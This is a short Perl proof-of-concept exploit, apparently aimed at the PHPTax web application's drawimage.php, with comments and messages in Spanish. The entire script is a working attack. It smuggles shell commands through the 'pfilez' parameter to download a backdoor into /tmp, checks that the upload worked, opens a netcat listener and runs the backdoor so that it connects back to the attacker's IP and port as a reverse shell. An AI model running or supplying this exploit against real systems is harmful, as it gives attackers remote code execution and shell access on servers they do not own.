poc.pl (@killr00t)

1. #!/usr/bin/perl
2. require LWP::Simple;
3. require LWP::UserAgent;
4.  
5. my $ua = LWP::UserAgent->new;
6. $ua->agent("Mozilla/4.0");
7.  
8. $backdoor = $ARGV[0];
9. $atacante = $ARGV[1];
10. $puerto   = $ARGV[2];
11.  
12. if(!$backdoor || !atacante || !$puerto ){&help();}else{ &subirback();}
13.  
14. sub subirback{
15.     $test  ="test";
16.     $subir = "http://172.16.49.129:8080/phptax/drawimage.php?pfilez=xxx;fetch%20-o%20/tmp/%20".$backdoor."%20;&pdf=make";
17.     $list  = "http://172.16.49.129:8080/phptax/drawimage.php?pfilez=xxx;ls%20%-la%20/tmp/bdoor%20%3e".$test.";&pdf=make";
18.     $veri  = "http://172.16.49.129:8080/phptax/".$test;
19.  
20.     print "[+] Subiendo Backdoor ...\n";
21.     $su  = $ua->get($subir);
22.     $li  = $ua->get($list);
23.    
24.     print "[+] Verificando Upload Backdoor ...\n";
25.     $ve  = $ua->get($veri);
26.     $inf = $ve->content();
27.    
28.     if($ve->status_line()=~m/200/g and length($inf)>5){
29.         print "[+] Backdoor Subido Correctamente\n";
30.         print "[+] Ejecutando Backdoor ...\n";
31.         system("xterm -e nc -lvvp ".$puerto."&");
32.         &ejecutarback();
33.     }else{
34.         print "[x] Error al subir, verifique Ruta de backdoor\n";
35.     }  
36. }
37.  
38.  
39. sub ejecutarback{
40.  
41.     $url="http://172.16.49.129:8080/phptax/drawimage.php?pfilez=xxx;%20perl%20/tmp/bdoor%20".$atacante."%20".$puerto.";&pdf=make";
42.     sleep(1);
43.     $res = $ua->get($url);
44.     print "\n[Done]\n";
45. }
46.  
47. sub help{
48.     print "Uso: erl $0 <rutaBackdoor> <ipAtacante> <puertoAtacante>\n";
49. }